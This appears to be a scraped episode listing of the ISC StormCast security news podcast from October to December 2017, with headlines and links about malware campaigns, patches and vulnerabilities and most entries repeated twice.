Brazilian Banking Malware Uses UTF-16 Encoded .BAT File https://isc.sans.edu/forums/diary/Phishing+campaign+uses+old+bat+script+to+spread+banking+malware+and+it+is+flying+under+the+radar/23091/ Phishing Abuse of JotForm https://isc.sans.edu/forums/diary/Phishing+Kit+AbUsing+Cloud+Services/23089/ Apple Releases iOS 11.2 https://support.apple.com/en-us/HT201222 (no details live yet) Critical Patch For RSA Authentication Agent http://seclists.org/fulldisclosure/2017/Nov/46 https://community.rsa.com/community/products/securid/authentication-agent-web-apache Slurp S3 Bucket Enumerator https://github.com/bbb31/slurp.git
12/4/20175 minutes, 40 seconds
Episode Artwork

ISC StormCast for Monday, December 4th 2017

Brazilian Banking Malware Uses UTF-16 Encoded .BAT File https://isc.sans.edu/forums/diary/Phishing+campaign+uses+old+bat+script+to+spread+banking+malware+and+it+is+flying+under+the+radar/23091/ Phishing Abuse of JotForm https://isc.sans.edu/forums/diary/Phishing+Kit+AbUsing+Cloud+Services/23089/ Apple Releases iOS 11.2 https://support.apple.com/en-us/HT201222 (no details live yet) Critical Patch For RSA Authentication Agent http://seclists.org/fulldisclosure/2017/Nov/46 https://community.rsa.com/community/products/securid/authentication-agent-web-apache Slurp S3 Bucket Enumerator https://github.com/bbb31/slurp.git
12/4/20175 minutes, 40 seconds
Episode Artwork

ISC StormCast for Friday, December 1st 2017

More Malspam Pushing Emotet Malware https://isc.sans.edu/forums/diary/More+Malspam+pushing+Emotet+malware/23083/ Google Chrome To Block Some Third Party Software Mid-2018 https://blog.chromium.org/2017/11/reducing-chrome-crashes-caused-by-third.html European Union Funds VLC Bug Bounty https://joinup.ec.europa.eu/news/hackerone-vlc STI Student Scott Perry: Virtual System Forensics http://www.sans.org/reading-room/whitepapers/bestprac/exploring-effectiveness-approaches-discovering-acquiring-virtualized-servers-esxi-38155
12/1/201714 minutes, 35 seconds
Episode Artwork

ISC StormCast for Friday, December 1st 2017

More Malspam Pushing Emotet Malware https://isc.sans.edu/forums/diary/More+Malspam+pushing+Emotet+malware/23083/ Google Chrome To Block Some Third Party Software Mid-2018 https://blog.chromium.org/2017/11/reducing-chrome-crashes-caused-by-third.html European Union Funds VLC Bug Bounty https://joinup.ec.europa.eu/news/hackerone-vlc STI Student Scott Perry: Virtual System Forensics http://www.sans.org/reading-room/whitepapers/bestprac/exploring-effectiveness-approaches-discovering-acquiring-virtualized-servers-esxi-38155
12/1/201714 minutes, 35 seconds
Episode Artwork

ISC StormCast for Thursday, November 30th 2017

Apple Releases Security Update 2017-001 To Fix Passwordless Root Bug https://support.apple.com/en-us/HT208315 Insecure Android Crypto Currency Wallets https://www.htbridge.com/news/security-cryptocurrency-mobile-apps.html Coinhive Miner Now As Pop-Under https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/ Fileless Malicious PowerShell Sample https://isc.sans.edu/forums/diary/Fileless+Malicious+PowerShell+Sample/23081/ .dev TLD Now Requires HTTPS in Chrome http://www.theregister.co.uk/2017/11/29/google_dev_network/
11/30/20175 minutes, 22 seconds
Episode Artwork

ISC StormCast for Thursday, November 30th 2017

Apple Releases Security Update 2017-001 To Fix Passwordless Root Bug https://support.apple.com/en-us/HT208315 Insecure Android Crypto Currency Wallets https://www.htbridge.com/news/security-cryptocurrency-mobile-apps.html Coinhive Miner Now As Pop-Under https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/ Fileless Malicious PowerShell Sample https://isc.sans.edu/forums/diary/Fileless+Malicious+PowerShell+Sample/23081/ .dev TLD Now Requires HTTPS in Chrome http://www.theregister.co.uk/2017/11/29/google_dev_network/
11/30/20175 minutes, 22 seconds
Episode Artwork

ISC StormCast for Wednesday, November 29th 2017

Password Less Root Account Allows for Trivial Privilege Escalation on MacOS High Sierra https://twitter.com/lemiorhan/status/935578694541770752 https://support.apple.com/en-us/HT204012 Defeating Facial Recognition https://arxiv.org/abs/1711.09001 Bitcoin Gold Wallet App Compromise https://bitcoingold.org/critical-warning-nov-26/ Project Exodus Identified Trackers in Android Apps https://reports.exodus-privacy.eu.org/reports/apps/
11/29/20176 minutes, 21 seconds
Episode Artwork

ISC StormCast for Wednesday, November 29th 2017

Password Less Root Account Allows for Trivial Privilege Escalation on MacOS High Sierra https://twitter.com/lemiorhan/status/935578694541770752 https://support.apple.com/en-us/HT204012 Defeating Facial Recognition https://arxiv.org/abs/1711.09001 Bitcoin Gold Wallet App Compromise https://bitcoingold.org/critical-warning-nov-26/ Project Exodus Identified Trackers in Android Apps https://reports.exodus-privacy.eu.org/reports/apps/
11/29/20176 minutes, 21 seconds
Episode Artwork

ISC StormCast for Tuesday, November 28th 2017

Golden SAML Ticket Attack https://www.cyberark.com/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-cloud-apps/ Facebook Poll Image Vulnerability https://blog.darabi.me/2017/11/image-removal-vulnerability-in-facebook.html
11/28/20176 minutes, 34 seconds
Episode Artwork

ISC StormCast for Tuesday, November 28th 2017

Golden SAML Ticket Attack https://www.cyberark.com/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-cloud-apps/ Facebook Poll Image Vulnerability https://blog.darabi.me/2017/11/image-removal-vulnerability-in-facebook.html
11/28/20176 minutes, 34 seconds
Episode Artwork

ISC StormCast for Monday, November 27th 2017

Critical Exim Mail Server Vulnerability (Exploit released!) https://bugs.exim.org/show_bug.cgi?id=2199 CoinPouch "Verge" Token Loss http://www.documentcloud.org/documents/4309909-StatementonVerge-11-21-17.html Bitcoin Routing Attacks https://btc-hijack.ethz.ch Scanning Ethereum Smart Contracts For Vulnerabilities https://hackernoon.com/scanning-ethereum-smart-contracts-for-vulnerabilities-b5caefd995df Fortiweb Manager Vulnerability https://fortiguard.com/psirt/FG-IR-17-248
11/27/20175 minutes, 52 seconds
Episode Artwork

ISC StormCast for Monday, November 27th 2017

Critical Exim Mail Server Vulnerability (Exploit released!) https://bugs.exim.org/show_bug.cgi?id=2199 CoinPouch "Verge" Token Loss http://www.documentcloud.org/documents/4309909-StatementonVerge-11-21-17.html Bitcoin Routing Attacks https://btc-hijack.ethz.ch Scanning Ethereum Smart Contracts For Vulnerabilities https://hackernoon.com/scanning-ethereum-smart-contracts-for-vulnerabilities-b5caefd995df Fortiweb Manager Vulnerability https://fortiguard.com/psirt/FG-IR-17-248
11/27/20175 minutes, 52 seconds
Episode Artwork

ISC StormCast for Wednesday, November 22nd 2017

Ethereum JSON-RPC Scans https://isc.sans.edu/forums/diary/Internet+Wide+Ethereum+JSONRPC+Scans/23061/ Updated OWASP Top 10 Released https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf TPLink Often Provides Outdated Firmware Version For Download https://www.ctrl.blog/entry/tplink-firmware-outdated-downloads
11/22/20176 minutes, 49 seconds
Episode Artwork

ISC StormCast for Wednesday, November 22nd 2017

Ethereum JSON-RPC Scans https://isc.sans.edu/forums/diary/Internet+Wide+Ethereum+JSONRPC+Scans/23061/ Updated OWASP Top 10 Released https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf TPLink Often Provides Outdated Firmware Version For Download https://www.ctrl.blog/entry/tplink-firmware-outdated-downloads
11/22/20176 minutes, 49 seconds
Episode Artwork

ISC StormCast for Tuesday, November 21st 2017

Intel Patches Several Vulnerabilities in its Management Engine https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00086&languageid=en-fr Sandsifter CPU Fuzzer https://github.com/xoreaxeaxeax/sandsifter/ Android MediaProjection API Allows For Screen Capture / Audio Recording Without User Consent https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-android-MediaProjection-tapjacking-advisory-2017-11-13.pdf BusyBox Autocompletion Vulnerability https://www.twistlock.com/2017/11/20/cve-2017-16544-busybox-autocompletion-vulnerability/
11/21/20175 minutes, 42 seconds
Episode Artwork

ISC StormCast for Tuesday, November 21st 2017

Intel Patches Several Vulnerabilities in its Management Engine https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00086&languageid=en-fr Sandsifter CPU Fuzzer https://github.com/xoreaxeaxeax/sandsifter/ Android MediaProjection API Allows For Screen Capture / Audio Recording Without User Consent https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-android-MediaProjection-tapjacking-advisory-2017-11-13.pdf BusyBox Autocompletion Vulnerability https://www.twistlock.com/2017/11/20/cve-2017-16544-busybox-autocompletion-vulnerability/
11/21/20175 minutes, 42 seconds
Episode Artwork

ISC StormCast for Monday, November 20th 2017

Bitcoin Pickpockets Scanning For Wallets https://isc.sans.edu/forums/diary/BTC+Pickpockets/23052/ Resume-themed Malspam Pushing Smoker Loader https://isc.sans.edu/forums/diary/Resumethemed+malspam+pushing+Smoke+Loader/23054/ F5-BigIP TLS Vulnerability https://support.f5.com/csp/article/K21905460 Microsoft Updates Patches / May Have Lost Sourcecode https://0patch.blogspot.com/2017/11/did-microsoft-just-manually-patch-their.html http://borncity.com/win/2017/11/17/microsoft-confirms-epson-dot-matrix-printer-issue-after-november-2017-patchday-here-are-fixes/ Windows 8 And Later Fail To Apply ASLR Correctly https://www.kb.cert.org/vuls/id/817544 StartCom TLS Certificate Authority Shutting Down http://www.zdnet.com/article/startcom-to-shut-down-all-certificates-revoked-in-2020/
11/20/20177 minutes, 8 seconds
Episode Artwork

ISC StormCast for Monday, November 20th 2017

Bitcoin Pickpockets Scanning For Wallets https://isc.sans.edu/forums/diary/BTC+Pickpockets/23052/ Resume-themed Malspam Pushing Smoker Loader https://isc.sans.edu/forums/diary/Resumethemed+malspam+pushing+Smoke+Loader/23054/ F5-BigIP TLS Vulnerability https://support.f5.com/csp/article/K21905460 Microsoft Updates Patches / May Have Lost Sourcecode https://0patch.blogspot.com/2017/11/did-microsoft-just-manually-patch-their.html http://borncity.com/win/2017/11/17/microsoft-confirms-epson-dot-matrix-printer-issue-after-november-2017-patchday-here-are-fixes/ Windows 8 And Later Fail To Apply ASLR Correctly https://www.kb.cert.org/vuls/id/817544 StartCom TLS Certificate Authority Shutting Down http://www.zdnet.com/article/startcom-to-shut-down-all-certificates-revoked-in-2020/
11/20/20177 minutes, 8 seconds
Episode Artwork

ISC StormCast for Friday, November 17th 2017

A Domain Dashboard For Splunk https://isc.sans.edu/forums/diary/Suspicious+Domains+Tracking+Dashboard/23046/ Oracle Critical PeopleSoft Patch http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-10269-4021872.html#AppendixFMW GitHub Introducing Security Alerts for Dependencies https://github.com/blog/2470-introducing-security-alerts-on-github Exposing IP Addresses For Hidden Services http://sh1ttykids.hateblo.jp/entry/2017/11/16/182001
11/17/20176 minutes
Episode Artwork

ISC StormCast for Friday, November 17th 2017

A Domain Dashboard For Splunk https://isc.sans.edu/forums/diary/Suspicious+Domains+Tracking+Dashboard/23046/ Oracle Critical PeopleSoft Patch http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-10269-4021872.html#AppendixFMW GitHub Introducing Security Alerts for Dependencies https://github.com/blog/2470-introducing-security-alerts-on-github Exposing IP Addresses For Hidden Services http://sh1ttykids.hateblo.jp/entry/2017/11/16/182001
11/17/20176 minutes
Episode Artwork

ISC StormCast for Thursday, November 16th 2017

Malicious Document Turns Off Word Macro Protections https://isc.sans.edu/forums/diary/If+you+want+something+done+right+do+it+yourself/23042/ Blueborne Affects Amazon Echo and Google Home Devices (now patched) http://go.armis.com/hubfs/BlueBorne%20Technical%20White%20Paper.pdf More Malicious Apps In Google's Play Store https://www.bleepingcomputer.com/news/security/google-play-store-sees-sudden-surge-of-malicious-apps/ OnePlus Phones Found With Preinstalled Debug App https://twitter.com/fs0c131y https://twitter.com/__Tux/status/754085708843786240
11/16/20176 minutes, 13 seconds
Episode Artwork

ISC StormCast for Thursday, November 16th 2017

Malicious Document Turns Off Word Macro Protections https://isc.sans.edu/forums/diary/If+you+want+something+done+right+do+it+yourself/23042/ Blueborne Affects Amazon Echo and Google Home Devices (now patched) http://go.armis.com/hubfs/BlueBorne%20Technical%20White%20Paper.pdf More Malicious Apps In Google's Play Store https://www.bleepingcomputer.com/news/security/google-play-store-sees-sudden-surge-of-malicious-apps/ OnePlus Phones Found With Preinstalled Debug App https://twitter.com/fs0c131y https://twitter.com/__Tux/status/754085708843786240
11/16/20176 minutes, 13 seconds
Episode Artwork

ISC StormCast for Wednesday, November 15th 2017

Microsoft Patch Tuesday Updates https://helpx.adobe.com/security.html Adobe Patches https://helpx.adobe.com/security.html Abusing Anti-Virus Quarantine Folders for Priv. Escalation https://bogner.sh/2017/11/avgater-getting-local-admin-by-abusing-the-anti-virus-quarantine/
11/15/20175 minutes, 45 seconds
Episode Artwork

ISC StormCast for Wednesday, November 15th 2017

Microsoft Patch Tuesday Updates https://helpx.adobe.com/security.html Adobe Patches https://helpx.adobe.com/security.html Abusing Anti-Virus Quarantine Folders for Priv. Escalation https://bogner.sh/2017/11/avgater-getting-local-admin-by-abusing-the-anti-virus-quarantine/
11/15/20175 minutes, 45 seconds
Episode Artwork

ISC StormCast for Tuesday, November 14th 2017

FaceID Beaten By Mask http://www.bkav.com/d/top-news/-/view_content/content/103968/face-id-beaten-by-mask-not-an-effective-security-measure Various URL Validation and HTTP Request Libraries Allow SSRF https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf Using Heart Rythm As Biometric ID http://www.buffalo.edu/news/releases/2017/09/034.html
11/14/20177 minutes, 55 seconds
Episode Artwork

ISC StormCast for Tuesday, November 14th 2017

FaceID Beaten By Mask http://www.bkav.com/d/top-news/-/view_content/content/103968/face-id-beaten-by-mask-not-an-effective-security-measure Various URL Validation and HTTP Request Libraries Allow SSRF https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf Using Heart Rythm As Biometric ID http://www.buffalo.edu/news/releases/2017/09/034.html
11/14/20177 minutes, 55 seconds
Episode Artwork

ISC StormCast for Monday, November 13th 2017

Auditing TLS Root Certificates on Windows https://isc.sans.edu/forums/diary/Keep+An+Eye+on+your+Root+Certificates/23030/ How Google Accounts Are Hijacked https://security.googleblog.com/2017/11/new-research-understanding-root-cause.html Battling E-Mail Phishing https://isc.sans.edu/forums/diary/Battling+email+phishing/23028/ Hacking Airplanes http://www.aviationtoday.com/2017/11/08/boeing-757-testing-shows-airplanes-vulnerable-hacking-dhs-says/
11/13/20176 minutes, 41 seconds
Episode Artwork

ISC StormCast for Monday, November 13th 2017

Auditing TLS Root Certificates on Windows https://isc.sans.edu/forums/diary/Keep+An+Eye+on+your+Root+Certificates/23030/ How Google Accounts Are Hijacked https://security.googleblog.com/2017/11/new-research-understanding-root-cause.html Battling E-Mail Phishing https://isc.sans.edu/forums/diary/Battling+email+phishing/23028/ Hacking Airplanes http://www.aviationtoday.com/2017/11/08/boeing-757-testing-shows-airplanes-vulnerable-hacking-dhs-says/
11/13/20176 minutes, 41 seconds
Episode Artwork

ISC StormCast for Friday, November 10th 2017

Twilio Credentials Found in Mobile Apps (requires registration) http://info.appthority.com/-q4-2017-mtr-download-eavesdropper Drive By Cryto Currency Mining Keeps Increasing https://go.malwarebytes.com/rs/805-USG-300/images/Drive-by_Mining_FINAL.pdf Intel's Management Engine Firmware Decoded https://twitter.com/h0t_max https://www.theregister.co.uk/2017/11/09/chipzilla_come_closer_closer_listen_dump_ime/
11/10/20177 minutes, 9 seconds
Episode Artwork

ISC StormCast for Friday, November 10th 2017

Twilio Credentials Found in Mobile Apps (requires registration) http://info.appthority.com/-q4-2017-mtr-download-eavesdropper Drive By Cryto Currency Mining Keeps Increasing https://go.malwarebytes.com/rs/805-USG-300/images/Drive-by_Mining_FINAL.pdf Intel's Management Engine Firmware Decoded https://twitter.com/h0t_max https://www.theregister.co.uk/2017/11/09/chipzilla_come_closer_closer_listen_dump_ime/
11/10/20177 minutes, 9 seconds
Episode Artwork

ISC StormCast for Thursday, November 9th 2017

Mantistek Gaming Keyboard Cloud Driver Exfiltrates Keystroke Data https://thehackernews.com/2017/11/mantistek-keyboard-keylogger.html Logitech Will Discontinue Harmony Link Device and Brick it via Firmware Update in March 2018 https://www.theverge.com/circuitbreaker/2017/11/8/16623076/logitech-harmony-link-discontinued-bricked Amazon Is Introducing Additional Security Features for S3 https://aws.amazon.com/blogs/aws/new-amazon-s3-encryption-security-features/
11/9/20176 minutes, 26 seconds
Episode Artwork

ISC StormCast for Thursday, November 9th 2017

Mantistek Gaming Keyboard Cloud Driver Exfiltrates Keystroke Data https://thehackernews.com/2017/11/mantistek-keyboard-keylogger.html Logitech Will Discontinue Harmony Link Device and Brick it via Firmware Update in March 2018 https://www.theverge.com/circuitbreaker/2017/11/8/16623076/logitech-harmony-link-discontinued-bricked Amazon Is Introducing Additional Security Features for S3 https://aws.amazon.com/blogs/aws/new-amazon-s3-encryption-security-features/
11/9/20176 minutes, 26 seconds
Episode Artwork

ISC StormCast for Wednesday, November 8th 2017

Interesting RTF Maldoc VBA Dropper https://isc.sans.edu/forums/diary/Interesting+VBA+Dropper/23016/ Multiple Linux USB Flaws Made Public http://www.openwall.com/lists/oss-security/2017/11/06/8 Google Android November Patches https://source.android.com/security/bulletin/2017-11-01#media-framework Ethereum Multi Signature Wallet Bug Cause Loss of $280 Million https://paritytech.io/blog/security-alert.html https://github.com/paritytech/parity/issues/6995
11/8/20176 minutes, 31 seconds
Episode Artwork

ISC StormCast for Wednesday, November 8th 2017

Interesting RTF Maldoc VBA Dropper https://isc.sans.edu/forums/diary/Interesting+VBA+Dropper/23016/ Multiple Linux USB Flaws Made Public http://www.openwall.com/lists/oss-security/2017/11/06/8 Google Android November Patches https://source.android.com/security/bulletin/2017-11-01#media-framework Ethereum Multi Signature Wallet Bug Cause Loss of $280 Million https://paritytech.io/blog/security-alert.html https://github.com/paritytech/parity/issues/6995
11/8/20176 minutes, 31 seconds
Episode Artwork

ISC StormCast for Tuesday, November 7th 2017

Fake WhatsApp App in Google Play Store https://www.reddit.com/r/Android/comments/7ahujw/psa_two_different_developers_under_the_same_name/ Crunchyroll.com Redirect Leads to Malware https://blog.ellation.com/crunchyroll-com-update-a2a593cf9155 https://bartblaze.blogspot.com.au/2017/11/crunchyroll-hack-delivers-malware.html Recovering Previously Encrypted iOS Backups https://www.gillware.com/forensics/blog/digital-forensics-case-study/new-solution-encrypted-backups/
11/7/20176 minutes, 17 seconds
Episode Artwork

ISC StormCast for Tuesday, November 7th 2017

Fake WhatsApp App in Google Play Store https://www.reddit.com/r/Android/comments/7ahujw/psa_two_different_developers_under_the_same_name/ Crunchyroll.com Redirect Leads to Malware https://blog.ellation.com/crunchyroll-com-update-a2a593cf9155 https://bartblaze.blogspot.com.au/2017/11/crunchyroll-hack-delivers-malware.html Recovering Previously Encrypted iOS Backups https://www.gillware.com/forensics/blog/digital-forensics-case-study/new-solution-encrypted-backups/
11/7/20176 minutes, 17 seconds
Episode Artwork

ISC StormCast for Monday, November 6th 2017

PDF Parser for URLs and Text Content of PDFs https://isc.sans.edu/forums/diary/Extracting+the+text+from+PDF+documents/23008/ https://isc.sans.edu/forums/diary/PDF+documents+URLs/23006/ Mobile Pwn2Own Contest 2017 https://www.zerodayinitiative.com/blog OpenSSL Patch https://www.openssl.org/news/secadv/20171102.txt IEEE P1735 Standard Leads to Weak Crypto https://eprint.iacr.org/2017/828.pdf
11/6/20175 minutes, 15 seconds
Episode Artwork

ISC StormCast for Monday, November 6th 2017

PDF Parser for URLs and Text Content of PDFs https://isc.sans.edu/forums/diary/Extracting+the+text+from+PDF+documents/23008/ https://isc.sans.edu/forums/diary/PDF+documents+URLs/23006/ Mobile Pwn2Own Contest 2017 https://www.zerodayinitiative.com/blog OpenSSL Patch https://www.openssl.org/news/secadv/20171102.txt IEEE P1735 Standard Leads to Weak Crypto https://eprint.iacr.org/2017/828.pdf
11/6/20175 minutes, 15 seconds
Episode Artwork

ISC StormCast for Friday, November 3rd 2017

Certified Malware: Measuring Breaches of Trust in the Windows Code-Signing PKI http://www.umiacs.umd.edu/~tdumitra/papers/CCS-2017.pdf Half of Most Popular Free iOS Apps do not use TLS correctly http://www.zeit.de/digital/datenschutz/2017-10/iphone-ios-apps-hacker-verschluesselung/komplettansicht#comments Image Downloader Chrome Extension Includes Adware https://www.bleepingcomputer.com/news/security/psa-beware-the-image-downloader-chrome-adware-extension/ Employees Pay Up Ransomware https://www.bleepingcomputer.com/news/security/59-percent-of-employees-hit-by-ransomware-at-work-paid-ransom-out-of-their-own-pockets/
11/2/20177 minutes, 13 seconds
Episode Artwork

ISC StormCast for Friday, November 3rd 2017

Certified Malware: Measuring Breaches of Trust in the Windows Code-Signing PKI http://www.umiacs.umd.edu/~tdumitra/papers/CCS-2017.pdf Half of Most Popular Free iOS Apps do not use TLS correctly http://www.zeit.de/digital/datenschutz/2017-10/iphone-ios-apps-hacker-verschluesselung/komplettansicht#comments Image Downloader Chrome Extension Includes Adware https://www.bleepingcomputer.com/news/security/psa-beware-the-image-downloader-chrome-adware-extension/ Employees Pay Up Ransomware https://www.bleepingcomputer.com/news/security/59-percent-of-employees-hit-by-ransomware-at-work-paid-ransom-out-of-their-own-pockets/
11/2/20177 minutes, 13 seconds
Episode Artwork

ISC StormCast for Thursday, November 2nd 2017

Configuring SSH Properly on Cisco IOS https://isc.sans.edu/forums/diary/Securing+SSH+Services+Go+Blue+Team/22992/ Ethereum Miners Hijacked via Default SSH Credentials https://labs.bitdefender.com/2017/11/ethereum-os-miners-targeted-by-ssh-based-hijacker/ Crypto Shuffler Steals Bitcoin From Clipboard https://www.kaspersky.com/blog/cryptoshuffler-bitcoin-stealer/19976/ Google Calender Event Injection Added To Mail Snipper https://www.blackhillsinfosec.com/google-calendar-event-injection-mailsniper/ November Ouch! Newsletter released: Shopping Security Online https://securingthehuman.sans.org/resources/newsletters/ouch/2017?utm_medium=Social&utm_source=Twitter&utm_content=OUCH+Nov+2017+all+languages+&utm_campaign=STH+Ouch+#november2017
11/1/20175 minutes, 37 seconds
Episode Artwork

ISC StormCast for Thursday, November 2nd 2017

Configuring SSH Properly on Cisco IOS https://isc.sans.edu/forums/diary/Securing+SSH+Services+Go+Blue+Team/22992/ Ethereum Miners Hijacked via Default SSH Credentials https://labs.bitdefender.com/2017/11/ethereum-os-miners-targeted-by-ssh-based-hijacker/ Crypto Shuffler Steals Bitcoin From Clipboard https://www.kaspersky.com/blog/cryptoshuffler-bitcoin-stealer/19976/ Google Calender Event Injection Added To Mail Snipper https://www.blackhillsinfosec.com/google-calendar-event-injection-mailsniper/ November Ouch! Newsletter released: Shopping Security Online https://securingthehuman.sans.org/resources/newsletters/ouch/2017?utm_medium=Social&utm_source=Twitter&utm_content=OUCH+Nov+2017+all+languages+&utm_campaign=STH+Ouch+#november2017
11/1/20175 minutes, 37 seconds
Episode Artwork

ISC StormCast for Wednesday, November 1st 2017

Malicious Powershell Code https://isc.sans.edu/forums/diary/Some+Powershell+Malicious+Code/22988/ Apple Updates Everything https://support.apple.com/en-gb/HT201222 Internet Draft To Update IoT Devices https://tools.ietf.org/html/draft-moran-suit-architecture-00
10/31/20175 minutes, 21 seconds
Episode Artwork

ISC StormCast for Wednesday, November 1st 2017

Malicious Powershell Code https://isc.sans.edu/forums/diary/Some+Powershell+Malicious+Code/22988/ Apple Updates Everything https://support.apple.com/en-gb/HT201222 Internet Draft To Update IoT Devices https://tools.ietf.org/html/draft-moran-suit-architecture-00
10/31/20175 minutes, 21 seconds
Episode Artwork

ISC StormCast for Tuesday, October 31st 2017

Google Chrome Moving Away from HTTPS Public Key Pinning (HPKP) https://groups.google.com/a/chromium.org/forum/#!msg/blink-dev/he9tr7p3rZ8/eNMwKPmUBAAJ Effort To Remove Trust From Dutch CA Over New Intercept Law https://bugzilla.mozilla.org/show_bug.cgi?id=1408647 Crypto Coin Mining Feature Found in Google App Store Downloads http://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/
10/30/20176 minutes, 8 seconds
Episode Artwork

ISC StormCast for Tuesday, October 31st 2017

Google Chrome Moving Away from HTTPS Public Key Pinning (HPKP) https://groups.google.com/a/chromium.org/forum/#!msg/blink-dev/he9tr7p3rZ8/eNMwKPmUBAAJ Effort To Remove Trust From Dutch CA Over New Intercept Law https://bugzilla.mozilla.org/show_bug.cgi?id=1408647 Crypto Coin Mining Feature Found in Google App Store Downloads http://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/
10/30/20176 minutes, 8 seconds
Episode Artwork

ISC StormCast for Monday, October 30th 2017

Critical New Oracle Patch http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-10151-4016513.html CatchAll Google Chrome Plugins https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/ ACE Files Used For Malware https://isc.sans.edu/forums/diary/Remember+ACE+files/22978/
10/29/20175 minutes, 6 seconds
Episode Artwork

ISC StormCast for Monday, October 30th 2017

Critical New Oracle Patch http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-10151-4016513.html CatchAll Google Chrome Plugins https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/ ACE Files Used For Malware https://isc.sans.edu/forums/diary/Remember+ACE+files/22978/
10/29/20175 minutes, 6 seconds
Episode Artwork

ISC StormCast for Friday, October 27th 2017

Results of Kaspersky's Internal Investigation https://www.kaspersky.com/blog/internal-investigation-preliminary-results/19894/ Infineon Bug Testing Tool https://gist.githubusercontent.com/marcan/fc87aa78085c2b6f979aefc73fdc381f/raw/526bc2f2249a2e3f5d4450c7c412e0dbf57b2288/roca_test.py https://github.com/ThomasHabets/simple-tpm-pk11/blob/master/check-srk/check-srk.cc Micropatch Available for "DDE Vulnerability" https://0patch.blogspot.com/2017/10/0patching-office-dde-ddeauto.html Finding Cryptocurrency Miners https://medium.com/@s3yfullah/hacking-cryptocurrency-miners-with-osint-techniques-677bbb3e0157
10/26/20175 minutes, 58 seconds
Episode Artwork

ISC StormCast for Friday, October 27th 2017

Results of Kaspersky's Internal Investigation https://www.kaspersky.com/blog/internal-investigation-preliminary-results/19894/ Infineon Bug Testing Tool https://gist.githubusercontent.com/marcan/fc87aa78085c2b6f979aefc73fdc381f/raw/526bc2f2249a2e3f5d4450c7c412e0dbf57b2288/roca_test.py https://github.com/ThomasHabets/simple-tpm-pk11/blob/master/check-srk/check-srk.cc Micropatch Available for "DDE Vulnerability" https://0patch.blogspot.com/2017/10/0patching-office-dde-ddeauto.html Finding Cryptocurrency Miners https://medium.com/@s3yfullah/hacking-cryptocurrency-miners-with-osint-techniques-677bbb3e0157
10/26/20175 minutes, 58 seconds
Episode Artwork

ISC StormCast for Thursday, October 26th 2017

Coinhive Domain Compromise https://coinhive.com/blog/dns-breach Dell Loses Control of Backup and Recovery Cloud Storage Domain https://krebsonsecurity.com/2017/10/dell-lost-control-of-key-customer-support-domain-for-a-month-in-2017/#more-41267 Google ReCaptcha Broken https://github.com/ecthros/uncaptcha Users in Iran Targeted by Cryptoransomware Masquerading as VPN https://www.bleepingcomputer.com/news/security/tyrant-ransomware-spreads-in-iran-disguised-as-popular-vpn-app/ Crypto Currency Phishing https://www.dearbytes.com/blog/cryptocurrency-phishing/
10/25/20176 minutes, 25 seconds
Episode Artwork

ISC StormCast for Thursday, October 26th 2017

Coinhive Domain Compromise https://coinhive.com/blog/dns-breach Dell Loses Control of Backup and Recovery Cloud Storage Domain https://krebsonsecurity.com/2017/10/dell-lost-control-of-key-customer-support-domain-for-a-month-in-2017/#more-41267 Google ReCaptcha Broken https://github.com/ecthros/uncaptcha Users in Iran Targeted by Cryptoransomware Masquerading as VPN https://www.bleepingcomputer.com/news/security/tyrant-ransomware-spreads-in-iran-disguised-as-popular-vpn-app/ Crypto Currency Phishing https://www.dearbytes.com/blog/cryptocurrency-phishing/
10/25/20176 minutes, 25 seconds
Episode Artwork

ISC StormCast for Wednesday, October 25th 2017

Stop Relying on File Extensions https://isc.sans.edu/forums/diary/Stop+relying+on+file+extensions/22962/ BadRabbit New Ransomware Wave Hitting Russia and Ukraine https://isc.sans.edu/forums/diary/BadRabbit+New+ransomware+wave+hitting+RU+UA/22964/ https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/ Over 70% Of Web Traffic Now via TLS https://transparencyreport.google.com/https/overview?hl=en Static RNG Seeds in Fortinet Devices https://duhkattack.com
10/24/20175 minutes, 4 seconds
Episode Artwork

ISC StormCast for Wednesday, October 25th 2017

Stop Relying on File Extensions https://isc.sans.edu/forums/diary/Stop+relying+on+file+extensions/22962/ BadRabbit New Ransomware Wave Hitting Russia and Ukraine https://isc.sans.edu/forums/diary/BadRabbit+New+ransomware+wave+hitting+RU+UA/22964/ https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/ Over 70% Of Web Traffic Now via TLS https://transparencyreport.google.com/https/overview?hl=en Static RNG Seeds in Fortinet Devices https://duhkattack.com
10/24/20175 minutes, 4 seconds
Episode Artwork

ISC StormCast for Tuesday, October 24th 2017

Is a Telco in Brazil Hosing An Epidemic of Open SOCKS Proxies? https://isc.sans.edu/forums/diary/Is+a+telco+in+Brazil+hosting+an+epidemic+of+open+SOCKS+proxies/22956/ Android May Be Adding DNS Over TLS https://www.xda-developers.com https://tools.ietf.org/html/rfc7858 Fake Crypto Currency Trading Applications https://www.welivesecurity.com/2017/10/23/fake-cryptocurrency-apps-google-harvesting-credentials/
10/23/20176 minutes, 3 seconds
Episode Artwork

